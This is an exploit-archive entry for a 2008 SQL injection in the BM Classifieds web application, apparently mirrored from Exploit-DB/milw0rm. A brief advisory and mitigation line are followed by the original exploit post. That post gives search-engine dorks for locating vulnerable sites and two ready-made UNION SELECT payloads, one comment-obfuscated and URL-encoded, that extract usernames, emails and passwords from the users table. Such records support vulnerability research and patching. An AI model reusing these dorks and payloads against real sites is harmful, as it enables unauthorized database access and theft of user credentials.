BM Classifieds (listingid),(ad)SQL Injection Vulnerability

vendor:

BM Classifieds

by:

xcorpitx

CVSS

HIGH

SQL Injection

CWE

Product Name: BM Classifieds

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

BM Classifieds (listingid),(ad)SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'listingid' and 'ad' parameters to the 'showad.php' and 'pfriendly.php' scripts. A remote attacker can execute arbitrary SQL commands in the application's database, compromise the application, access or modify data, exploit vulnerabilities in the underlying database and in certain cases gain access to the server.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should sanitize user-supplied input to prevent SQL injection attacks.

Source

Exploit-DB raw data:

..##.....##     
...##...##      
....##.##
.....###CoRPITX 
.....###     
....##.##
...##...##
..##.....##

########################### Turkey ####################################
#                                                                     #
#################### www.Hayalet-hack.com #############################
#
##################### www.zone-turk.net/###############################
#             
#Powered by BM Classifieds (listingid),(ad)SQL Injection Vulnerability 
#
#######################################################################
#  
#  AUTHOR : xcorpitx
#
#  HOME   : www.Hayalet-hack.com / www.zone-turk.net
#
########################################################################

########################################################################
#
#  Dork 1 : ''showad.php?listingid=''
#
#  Dork 2 : ''pfriendly.php?ad=''
#
########################################################################
#            
#  EXPLOIT: 
#
########################################################################
#
#
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*
#
#
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,concat(username,0x3a,email),password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
#
#
########################################################################

Thanx :str0ke, pc faresi, s@bun,D3ng3s!z,hayalet,Turque,SmoKin

# milw0rm.com [2008-03-09]